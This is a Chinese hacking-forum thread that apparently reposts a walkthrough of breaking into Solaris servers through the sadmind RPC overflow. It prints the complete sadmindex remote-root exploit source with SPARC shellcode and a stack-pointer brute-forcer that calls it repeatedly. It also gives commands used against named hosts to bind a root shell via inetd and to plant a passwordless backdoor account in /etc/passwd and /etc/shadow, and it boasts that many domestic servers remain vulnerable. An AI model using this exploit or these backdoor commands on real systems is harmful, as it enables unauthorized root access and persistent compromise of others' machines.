|
 | 作者: newmyth21 [newmyth21]
 论坛用户 |
登录 |
| telnet 209.108.98.198 SunOS 5.6 login:TomyChen passwd:() [Tomy@fuckusa-server]$/tmp/./libc ping /*Sun OS 的一个本地溢出*/ .................. .................. [Tomy@fuckusa-server]# /* [Tomy@fuckusa-server]# rpcinfo -p 209.108.98.198 program vers proto port service 100000 4 tcp 111 rpcbind 100000 3 tcp 111 rpcbind 100000 2 tcp 111 rpcbind 100000 4 udp 111 rpcbind 100000 3 udp 111 rpcbind 100024 1 udp 32774 status 100024 1 udp 32771 status 100232 10 upd 61358 sadmind /*看到了吧?没错,就是它,如果没有它在本地上,嗯……比较麻烦*/ ....................................... /以下的可以省就省了吧,/ [Tomy@fuckusa-server]# uname -a SunOS shit.fuckusa.com 5.6 Generic_105181-16 sun4u sparc SUNW,Ultra-2 /*是个sparc哦:)8/ [Tomy@fuckusa-server]# vi sadmindex-sparc.c /** *** sadmindex - SPARC Solaris remote root exploit for /usr/sbin/sadmind *** *** Tested and confirmed under Solaris 2.6 and 7.0 (SPARC) *** *** Usage: % sadmindex -h hostname -c command -s sp [-o offset] \ *** [-a alignment] [-p] *** *** where hostname is the hostname of the machine running the vulnerable *** system administration daemon, command is the command to run as root *** on the vulnerable machine, sp is the %sp stack pointer value, offset *** is the number of bytes to add to sp to calculate the desired return *** address, and alignment is the number of bytes needed to correctly *** align the contents of the exploit buffer. *** *** If run with a -p option, the exploit will only "ping" sadmind on the *** remote machine to start it running. The daemon will be otherwise *** untouched. Since pinging the daemon does not require an exploit *** buffer to be constructed, you can safely omit the -c and -s options *** if you use -p. *** *** When specifying a command, be sure to pass it to the exploit as a *** single argument, namely enclose the command string in quotes if it *** contains spaces or other special shell delimiter characters. The *** exploit will pass this string without modification to /bin/sh -c on *** the remote machine, so any normally allowed Bourne shell syntax is *** also allowed in the command string. The command string and the *** assembly code to run it must fit inside a buffer of 512 bytes, so *** the command string has a maximum length of about 380 bytes or so. *** *** Due to the nature of the target overflow in sadmind, the exploit is *** extremely sensitive to the %sp stack pointer value that is provided *** when the exploit is run. The %sp stack pointer must be specified *** with the exact required value, leaving no room for error. I have *** provided confirmed values for Solaris running on a Sun SPARCengine *** Ultra AXi machine running Solaris 2.6 5/98 and on a SPARCstation 1 *** running Solaris 7.0 10/98. On each system, sadmind was started from *** an instance of inetd that was started at boot time by init. There *** is a strong possibility that the demonstration values will not work *** due to differing sets of environment variables, for example if the *** the running inetd on the remote machine was started manually from an *** interactive shell. If you find that the sample value for %sp does *** not work, try adjusting the value by -2048 to 2048 from the sample in *** increments of 8 for starters. The offset parameter and the alignment *** parameter have default values that will be used if no overriding *** values are specified on the command line. The default values should *** be suitable and it will not likely be necessary to override them. *** *** Demonstration values for SPARC Solaris: *** *** (2.6) sadmindex -h host.example.com -c "touch HEH" -s 0xefff9580 *** (7.0) sadmindex -h host.example.com -c "touch HEH" -s 0xefff9418 *** *** THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER *** *** Cheez Whiz *** cheezbeast@hotmail.com *** *** June 24, 1999 **/ #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <string.h> #include <rpc/rpc.h> #define NETMGT_PROG 100232 #define NETMGT_VERS 10 #define NETMGT_PROC_PING 0 #define NETMGT_PROC_SERVICE 1 #define NETMGT_UDP_PING_TIMEOUT 30 #define NETMGT_UDP_PING_RETRY_TIMEOUT 5 #define NETMGT_UDP_SERVICE_TIMEOUT 1 #define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2 #define NETMGT_HEADER_TYPE 6 #define NETMGT_ARG_INT 3 #define NETMGT_ARG_STRING 9 #define NETMGT_ENDOFARGS "netmgt_endofargs" #define ADM_FW_VERSION "ADM_FW_VERSION" #define ADM_CLIENT_DOMAIN "ADM_CLIENT_DOMAIN" #define ADM_FENCE "ADM_FENCE" #define BUFLEN 1076 /* 256+256+32+32+512-12 */ #define ADDRLEN 560 /* 256+256+32+32-4-12 */ #define FRAMELEN1 608 #define FRAMELEN2 4200 #define LEN 84 #define OFFSET 688 /* default offset */ #define ALIGNMENT 4 /* default alignment */ #define NOP 0x801bc00f /* xor %o7,%o7,%g0 */ char shell[] = /* 0 */ "\x20\xbf\xff\xff" /* bn,a ? [2000]*/ /* skip: [2000]*/ /* 4 */ "\x20\xbf\xff\xff" /* bn,a ? [2000]*/ /* 8 */ "\x7f\xff\xff\xff" /* call skip [2000]*/ /* execve: [2000]*/ /* 12 */ "\x90\x03\xe0\x5c" /* add %o7,92,%o0 */ /* 16 */ "\x92\x22\x20\x10" /* sub %o0,16,%o1 */ /* 20 */ "\x94\x1b\xc0\x0f" /* xor %o7,%o7,%o2 */ /* 24 */ "\xec\x02\x3f\xf0" /* ld [%o0-16],%l6 */ /* 28 */ "\xac\x22\x80\x16" /* sub %o2,%l6,%l6 */ /* 32 */ "\xae\x02\x60\x10" /* add %o1,16,%l7 */ /* 36 */ "\xee\x22\x3f\xf0" /* st %l7,[%o0-16] */ /* 40 */ "\xae\x05\xe0\x08" /* add %l7,8,%l7 */ /* 44 */ "\xc0\x2d\xff\xff" /* stb %g0,[%l7-1] */ /* 48 */ "\xee\x22\x3f\xf4" /* st %l7,[%o0-12] */ /* 52 */ "\xae\x05\xe0\x03" /* add %l7,3,%l7 */ /* 56 */ "\xc0\x2d\xff\xff" /* stb %g0,[%l7-1] */ /* 60 */ "\xee\x22\x3f\xf8" /* st %l7,[%o0-8] */ /* 64 */ "\xae\x05\xc0\x16" /* add %l7,%l6,%l7 */ /* 68 */ "\xc0\x2d\xff\xff" /* stb %g0,[%l7-1] */ /* 72 */ "\xc0\x22\x3f\xfc" /* st %g0,[%o0-4] */ /* 76 */ "\x82\x10\x20\x3b" /* mov 59,%g1[2000]*/ /* 80 */ "\x91\xd0\x20\x08" /* ta 8 [2000]*/ /* data: [2000]*/ /* 84 */ "\xff\xff\xff\xff" /* DATA [2000]*/ /* 88 */ "\xff\xff\xff\xff" /* DATA [2000]*/ /* 92 */ "\xff\xff\xff\xff" /* DATA [2000]*/ /* 96 */ "\xff\xff\xff\xff" /* DATA [2000]*/ /* 100 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA [2000]*/ /* 108 */ "\x2d\x63\xff"; /* DATA [2000]*/ extern char *optarg; struct nm_send_header { struct timeval timeval1; struct timeval timeval2; struct timeval timeval3; unsigned int uint1; unsigned int uint2; unsigned int uint3; unsigned int uint4; unsigned int uint5; struct in_addr inaddr1; struct in_addr inaddr2; unsigned long ulong1; unsigned long ulong2; struct in_addr inaddr3; unsigned long ulong3; unsigned long ulong4; unsigned long ulong5; struct timeval timeval4; unsigned int uint6; struct timeval timeval5; char *string1; char *string2; char *string3; unsigned int uint7; }; struct nm_send_arg_int { char *string1; unsigned int uint1; unsigned int uint2; int int1; unsigned int uint3; unsigned int uint4; }; struct nm_send_arg_string { char *string1; unsigned int uint1; unsigned int uint2; char *string2; unsigned int uint3; unsigned int uint4; }; struct nm_send_footer { char *string1; }; struct nm_send { struct nm_send_header header; struct nm_send_arg_int version; struct nm_send_arg_string string; struct nm_send_arg_int fence; struct nm_send_footer footer; }; struct nm_reply { unsigned int uint1; unsigned int uint2; char *string1; }; bool_t xdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp) { char *addr; size_t size = sizeof(struct in_addr); if (!xdr_long(xdrs, &objp->timeval1.tv_sec)) return (FALSE); if (!xdr_long(xdrs, &objp->timeval1.tv_usec)) return (FALSE); if (!xdr_long(xdrs, &objp->timeval2.tv_sec)) return (FALSE); if (!xdr_long(xdrs, &objp->timeval2.tv_usec)) return (FALSE); if (!xdr_long(xdrs, &objp->timeval3.tv_sec)) return (FALSE); if (!xdr_long(xdrs, &objp->timeval3.tv_usec)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint1)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint2)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint3)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint4)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint5)) return (FALSE); addr = (char *) &objp->inaddr1.s_addr; if (!xdr_bytes(xdrs, &addr, &size, size)) return (FALSE); addr = (char *) &objp->inaddr2.s_addr; if (!xdr_bytes(xdrs, &addr, &size, size)) return (FALSE); if (!xdr_u_long(xdrs, &objp->ulong1)) return (FALSE); if (!xdr_u_long(xdrs, &objp->ulong2)) return (FALSE); addr = (char *) &objp->inaddr3.s_addr; if (!xdr_bytes(xdrs, &addr, &size, size)) return (FALSE); if (!xdr_u_long(xdrs, &objp->ulong3)) return (FALSE); if (!xdr_u_long(xdrs, &objp->ulong4)) return (FALSE); if (!xdr_u_long(xdrs, &objp->ulong5)) return (FALSE); if (!xdr_long(xdrs, &objp->timeval4.tv_sec)) return (FALSE); if (!xdr_long(xdrs, &objp->timeval4.tv_usec)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint6)) return (FALSE); if (!xdr_long(xdrs, &objp->timeval5.tv_sec)) return (FALSE); if (!xdr_long(xdrs, &objp->timeval5.tv_usec)) return (FALSE); if (!xdr_wrapstring(xdrs, &objp->string1)) return (FALSE); if (!xdr_wrapstring(xdrs, &objp->string2)) return (FALSE); if (!xdr_wrapstring(xdrs, &objp->string3)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint7)) return (FALSE); return (TRUE); } bool_t xdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp) { if (!xdr_wrapstring(xdrs, &objp->string1)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint1)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint2)) return (FALSE); if (!xdr_int(xdrs, &objp->int1)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint3)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint4)) return (FALSE); return (TRUE); } bool_t xdr_nm_send_arg_string(XDR *xdrs, struct nm_send_arg_string *objp) { if (!xdr_wrapstring(xdrs, &objp->string1)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint1)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint2)) return (FALSE); if (!xdr_wrapstring(xdrs, &objp->string2)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint3)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint4)) return (FALSE); return (TRUE); } bool_t xdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp) { if (!xdr_wrapstring(xdrs, &objp->string1)) return (FALSE); return (TRUE); } bool_t xdr_nm_send(XDR *xdrs, struct nm_send *objp) { if (!xdr_nm_send_header(xdrs, &objp->header)) return (FALSE); if (!xdr_nm_send_arg_int(xdrs, &objp->version)) return (FALSE); if (!xdr_nm_send_arg_string(xdrs, &objp->string)) return (FALSE); if (!xdr_nm_send_arg_int(xdrs, &objp->fence)) return (FALSE); if (!xdr_nm_send_footer(xdrs, &objp->footer)) return (FALSE); return (TRUE); } bool_t xdr_nm_reply(XDR *xdrs, struct nm_reply *objp) { if (!xdr_u_int(xdrs, &objp->uint1)) return (FALSE); if (!xdr_u_int(xdrs, &objp->uint2)) return (FALSE); if (!xdr_wrapstring(xdrs, &objp->string1)) return (FALSE); return (TRUE); } int main(int argc, char *argv[]) { CLIENT *cl; struct nm_send send; struct nm_reply reply; struct timeval tm; enum clnt_stat stat; int c, i, len, slen, clen; char *program, *cp, buf[BUFLEN+1]; char *hostname, *command; int offset, alignment, pinging = 0; unsigned long int sp = 0, fp, addr; program = argv[0]; hostname = "localhost"; command = "chmod 666 /etc/shadow"; offset = OFFSET; alignment = ALIGNMENT; while ((c = getopt(argc, argv, "h:c:s:o:a:p")) != EOF) { switch (c) { case 'h': hostname = optarg; break; case 'c': command = optarg; break; case 's': sp = strtoul(optarg, NULL, 0); break; case 'o': offset = (int) strtol(optarg, NULL, 0); break; case 'a': alignment = (int) strtol(optarg, NULL, 0); break; case 'p': pinging = 1; break; default: fprintf(stderr, "usage: %s -h hostname -c command -s sp " "[-o offset] [-a alignment] [-p]\n", program); exit(1); break; } } memset(buf, '\xff', BUFLEN); fp = sp + FRAMELEN1 + FRAMELEN2; fp &= 0xfffffff8; addr = sp + offset; addr &= 0xfffffffc; for (i = 0, cp = buf + alignment; i < ADDRLEN / 8; i++) { *cp++ = (fp >> 24) & 0xff; *cp++ = (fp >> 16) & 0xff; *cp++ = (fp >> 8) & 0xff; *cp++ = (fp >> 0) & 0xff; *cp++ = (addr >> 24) & 0xff; *cp++ = (addr >> 16) & 0xff; *cp++ = (addr >> 8) & 0xff; *cp++ = (addr >> 0) & 0xff; } slen = strlen(shell); clen = strlen(command); len = BUFLEN - 1 - clen - slen - ADDRLEN - alignment; len &= 0xfffffffc; for (i = 0; i < len / 4; i++) { *cp++ = (NOP >> 24) & 0xff; *cp++ = (NOP >> 16) & 0xff; *cp++ = (NOP >> 8) & 0xff; *cp++ = (NOP >> 0) & 0xff; } len = clen; len++; len = -len; shell[LEN+0] = (len >> 24) & 0xff; shell[LEN+1] = (len >> 16) & 0xff; shell[LEN+2] = (len >> 8) & 0xff; shell[LEN+3] = (len >> 0) & 0xff; memcpy(cp, shell, slen); cp += slen; memcpy(cp, command, clen); buf[BUFLEN] = '\0'; memset(&send, 0, sizeof(struct nm_send)); send.header.uint2 = NETMGT_HEADER_TYPE; send.header.string1 = ""; send.header.string2 = ""; send.header.string3 = ""; send.header.uint7 = strlen(ADM_FW_VERSION) + 1 + (4 * sizeof(unsigned int)) + sizeof(int) + strlen(ADM_CLIENT_DOMAIN) + 1 + (4 * sizeof(unsigned int)) + strlen(buf) + 1 + strlen(ADM_FENCE) + 1 + (4 * sizeof(unsigned int)) + sizeof(int) + strlen(NETMGT_ENDOFARGS) + 1; send.version.string1 = ADM_FW_VERSION; send.version.uint1 = NETMGT_ARG_INT; send.version.uint2 = sizeof(int); send.version.int1 = 1; send.string.string1 = ADM_CLIENT_DOMAIN; send.string.uint1 = NETMGT_ARG_STRING; send.string.uint2 = strlen(buf); send.string.string2 = buf; send.fence.string1 = ADM_FENCE; send.fence.uint1 = NETMGT_ARG_INT; send.fence.uint2 = sizeof(int); send.fence.int1 = 666; send.footer.string1 = NETMGT_ENDOFARGS; cl = clnt_create(hostname, NETMGT_PROG, NETMGT_VERS, "udp"); if (cl == NULL) { clnt_pcreateerror("clnt_create"); exit(1); } cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL); if (!pinging) { fprintf(stdout, "%%sp 0x%08lx offset %d --> return address 0x%08lx [%d]\n", sp, offset, addr, alignment); fprintf(stdout, "%%sp 0x%08lx with frame length %d --> %%fp 0x%08lx\n", sp, FRAMELEN1 + FRAMELEN2, fp); tm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT; tm.tv_usec = 0; if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) { fprintf(stderr, "exploit failed; unable to set timeout\n"); exit(1); } tm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT; tm.tv_usec = 0; if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) { fprintf(stderr, "exploit failed; unable to set timeout\n"); exit(1); } stat = clnt_call(cl, NETMGT_PROC_SERVICE, xdr_nm_send, (caddr_t) &send, xdr_nm_reply, (caddr_t) &reply, tm); if (stat != RPC_SUCCESS) { clnt_perror(cl, "clnt_call"); fprintf(stdout, "now check if exploit worked; " "RPC failure was expected\n"); exit(0); } fprintf(stderr, "exploit failed; " "RPC succeeded and returned { %u, %u, \"%s\" }\n", reply.uint1, reply.uint2, reply.string1); clnt_destroy(cl); exit(1); } else { tm.tv_sec = NETMGT_UDP_PING_TIMEOUT; tm.tv_usec = 0; if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) { fprintf(stderr, "exploit failed; unable to set timeout\n"); exit(1); } tm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT; tm.tv_usec = 0; if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) { fprintf(stderr, "exploit failed; unable to set timeout\n"); exit(1); } stat = clnt_call(cl, NETMGT_PROC_PING, xdr_void, NULL, xdr_void, NULL, tm); if (stat != RPC_SUCCESS) { clnt_perror(cl, "clnt_call"); exit(1); } clnt_destroy(cl); exit(0); } } /* www.hack.co.za */ :wq [Tomy@fuckusa-server]# gcc -o sadmindex-sparc sadmindex-sparc.c -lrpcsvc -lnsl -lsocket /*lrpcsvc -lnsl -lsocket 是一些网络函数和RCP函数所必需的链接库!!!*/ 还没扫描目标主机() 现在我们来扫描一个目标,嘿嘿… 还是用…… [Tomy@fuckusa-server]# rpcinfo -p www.usdie.com program vers proto port service 100000 4 tcp 111 rpcbind 100000 3 tcp 111 rpcbind 100000 2 tcp 111 rpcbind 100000 4 udp 111 rpcbind 100000 3 udp 111 rpcbind 100024 1 udp 32774 status 100024 1 udp 32771 status 100232 10 upd 61358 sadmind 100011 1 udp 61359 rquotad 100002 2 udp 61360 rusersd ....................................... ....................................... 100232 10 upd 61538 sadmind 看到了吗?对,没错,绝对错不了,就是它。 这说明该服务器开放了sadmind服务,使用udp监听端口61358.根据1999年12月分美国计算机紧急事件反应小组(CERT)的报告,sadmind存在着远程溢出(正是我们最喜欢的漏洞之一)漏洞,攻击者可以通过传送一个超长的缓存据到NETNGT_PROC_SERVICE,请求改写堆栈指针,从而得到root权限。 程序已经成功编译了。现在我们开工 程序运行格式是: ./sadmindex-sparc -h 目标主机 -c "shell命令"-s %sp 指针 shell命令就是要在远程主机上执行的命令。也就是说,发送过去的命令是以root身份执行的,但不会返回任何信息,所以是否成功,我们是无法看到的。 %sp指针是要溢出时偏移量,根据具体主机不同而有所不同。 开始试一下这个主机…… [Tomy@fuckusa-server]# ./sadmindex-sparc -h www.usdie.com -c "echo 'ingreslock stream tcp nowait root /bin/sh sh-I'>> /tmp/bob;/usr/sbin/inetd -s /tmp/bob" -s 0xefff9580 其中"echo 'ingreslock stream tcp nowait root /bin/sh sh-I'>> /tmp/bob;/usr/sbin/inetd -s /tmp/bob"是我们要在目标主机上执行的命令,作用是生成一个"ingerslock stream tcp nowait root /bin/sh sh-i"的/tmp/bob文件,然后用inetd 来启动它,如果成功的话,那么就可以在它的1024端口开一个挟让用telnet连接上去就可以直接以root的身份执行shell命令了。 怎么样? telnet www.usdie.com 1024 shit…连接失败!也就是说没有溢出成功咯……不会吧?放弃?真不爽…… 为什么不行呢?嗯……原来是: 问题在于%sp上,程序所给出的%sp是在特定的主机上的情况,对于我们的攻击目标而言,可能不是正确的%sp指针(废话,当然不是正确的啦,要是正确的早连上了)。 晕死……鬼知道目标机上的%sp指针是啥啊?靠……也太不好玩了吧?气死我也……别拉我……让我跳吧……(跳一楼)……别拉……别拉…… 咦?%sp的大小是从-2048到2048之间的数字呀…那么说……嘿嘿……暴力还是有得玩的嘛……哈哈……。靠……我怎么这么笨,就没想到? 看看以下这个程序有何感想??? [Tomy@fuckusa-server]# vi buffer.c #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <string.h> #include <sys/errno.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/stat.h> #include <fcntl.h> #include <netinet/in.h> #include <netdb.h> #include <unistd.h> /* *** ATTENTION *** you may have to change some of these *** ATTENTION *** */ #define EXPX86 "sadmindex-x86" /* sadmind exploit for x86 arch */ #define EXPSPARC "sadmindex-sparc" /* sadmind exploit for sparc arch */ #define INC 4 /* sp brute forcing incrementation - 4 should be ok */ /* DON'T change the following */ #define FALSE 0 /* false */ #define TRUE !FALSE /* true */ #define BINDINGRES "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \ > /tmp/.x; /usr/sbin/inetd -s /tmp/.x; r\ m -f /tmp/.x;" /* bind rootshell */ #define SPX8626 0x080418ec /* default sadmindex sp for x86 2.6 */ #define SPX867 0x08041798 /* default sadmindex sp for x86 7.0 */ #define SPSPARC26 0xefff9580 /* default sadmindex sp for sparc 2.6 */ #define SPSPARC7 0xefff9418 /* default sadmindex sp for sparc 7.0 */ #define EXPCMDX8626 "./%s -h %s -c \"%s\" -s 0x%x -j 512\n" /* cmd line */ #define EXPCMDX867 "./%s -h %s -c \"%s\" -s 0x%x -j 536\n" /* cmd line */ #define EXPCMDSPARC "./%s -h %s -c \"%s\" -s 0x%x\n" /* cmd line */ int main(int argc, char **argv) { int i, sockfd, fd, size = 4096, sign = -1; long int addr; char *buffer = (char *) malloc (size); struct hostent *he; struct sockaddr_in their_addr; if (argc < 3) { fprintf(stderr, "\nsadmindex sp brute forcer - by elux\n"); fprintf(stderr, "usage: %s [arch] <host>\n\n", argv[0]); fprintf(stderr, "\tarch:\n"); fprintf(stderr, "\t1 - x86 Solaris 2.6\n"); fprintf(stderr, "\t2 - x86 Solaris 7.0\n"); fprintf(stderr, "\t3 - SPARC Solaris 2.6\n"); fprintf(stderr, "\t4 - SPARC Solaris 7.0\n\n"); exit(TRUE); } if ( (he = gethostbyname(argv[2])) == NULL) { printf("Unable to resolve %s\n", argv[2]); exit(TRUE); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(1524); their_addr.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(their_addr.sin_zero), 8); if ( (strcmp(argv[1], "1")) == 0) { addr = SPX8626; printf("\nAlright... sit back and relax while this program brute forces the sp.\n\n"); for (i = 0; i <= 4096; i += INC) { if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1) { if ( (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == 0) { fprintf(stderr, "\n\nNow telnet to %s, on port 1524... be careful\n", argv[2]); close(sockfd); exit(FALSE); } } if ( (fd = open(EXPX86, O_RDONLY)) != -1) { sign *= -1; addr -= i *sign; snprintf(buffer, size, EXPCMDX8626, EXPX86, argv[2], BINDINGRES, addr); system(buffer); } else { printf("\n\n%s doesn't exisit, you need the sadmindex exploit\n", EXPX86); exit(TRUE); } } } else if ( (strcmp(argv[1], "2")) == 0) { addr = SPX867; printf("\nAlright... sit back and relax while this program brute forces the sp.\n\n"); for (i = 0; i <= 4096; i += INC) { if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1) { if ( (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == 0) { fprintf(stderr, "\n\nNow telnet to %s, on port 1524... be careful\n", argv[2]); close(sockfd); exit(FALSE); } } if ( (fd = open(EXPX86, O_RDONLY)) != -1) { sign *= -1; addr -= i *sign; snprintf(buffer, size, EXPCMDX867, EXPX86, argv[2], BINDINGRES, addr); system(buffer); } else { printf("\n\n%s doesn't exisit, you need the sadmindex exploit\n", EXPX86); exit(TRUE); } } } else if ( (strcmp(argv[1], "3")) == 0) { addr = SPSPARC26; printf("\nAlright... sit back and relax while this program brute forces the sp.\n\n"); for (i = 0; i <= 4096; i += INC) { if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1) { if ( (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == 0) { fprintf(stderr, "\n\nNow telnet to %s, on port 1524... be careful\n", argv[2]); close(sockfd); exit(FALSE); } } if ( (fd = open(EXPSPARC, O_RDONLY)) != -1) { sign *= -1; addr -= i *sign; snprintf(buffer, size, EXPCMDSPARC, EXPSPARC, argv[2], BINDINGRES, addr); system(buffer); } else { printf("\n\n%s doesn't exisit, you need the sadmindex exploit\n", EXPSPARC); exit(TRUE); } } } else if ( (strcmp(argv[1], "4")) == 0) { addr = SPSPARC7; printf("\nAlright... sit back and relax while this program brute forces the sp.\n\n"); for (i = 0; i <= 4096; i += INC) { if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1) { if ( (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == 0) { fprintf(stderr, "\n\nNow telnet to %s, on port 1524... be careful\n", argv[2]); close(sockfd); exit(FALSE); } } if ( (fd = open(EXPSPARC, O_RDONLY)) != -1) { sign *= -1; addr -= i *sign; snprintf(buffer, size, EXPCMDSPARC, EXPSPARC, argv[2], BINDINGRES, addr); system(buffer); } else { printf("\n\n%s doesn't exisit, you need the sadmindex exploit\n", EXPSPARC); exit(TRUE); } } } else printf("%s is not a supported arch, try 1 - 4 ... .. .\n", argv[1]); } // EOF 这个程序就是通过不断地测试,从0xefff9580-2048到+2048范围内的%sp指针作为攻击程序sadmindex-sparc的参数进行攻击,每次攻击完后都会连接到目标的端口进行检测是否成功,如果成功就放弃攻击如果不成功就接着猜。 编译 [Tomy@fuckusa-server]# gcc -o buffer buffer.c -lxnet [Tomy@fuckusa-server]# ./buffer www.usdie.com 开始工作… Succeed,Great! 终于成功的猜测出一%sp的指针,并且在目标机上打开了后门,现在我们就可以连上目标主机的1024端口了 [Tomy@fuckusa-server]#telnet www.usdie.com 1024 # 嘿嘿……每个命令都用“;”真的不爽,开个用户吧。 echo "tomy:x:1003:1003::/export/home/tomy:/bin/sh" >> /etc/passwd echo "tomy::::::::" >> /etc/shadow 记得是>>否则……嘿嘿……还有要在后面加上“;” 然后再用Tomy telnet上去,系统会提示你修秘密码:) 准备好了吗?把PP擦掉……嗯…… 看到了吗?这是99年发布的安全公告……可是现在,你只要随便的把国内的开放rpc服务的Solaris服务器扫描一遍就会发现有一大把是存在着此漏洞……而且不用费吹灰之力就可以干掉。 |
| 地主 发表时间: 03-12-31 15:57 |
| 回复: newmyth21 [newmyth21] 论坛用户 |
登录 |
是转载的,大家说说看呀? |
| B1层 发表时间: 03-12-31 16:45 |
 | 回复: afan271314 [afan271314] 论坛用户 |
登录 |
|
这怎么看啊 |
| B2层 发表时间: 03-12-31 21:26 |
 | 回复: Idof [idof]  论坛用户 |
登录 |
|
头上有小鸟! |
| B3层 发表时间: 03-12-31 21:52 |
 | 回复: TomyChen [quest] 版主 |
登录 |
|
这这 这.....我我我.....好久以前写的文章你都能翻出来..... |
| B4层 发表时间: 04-01-03 08:28 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: PRC漏洞!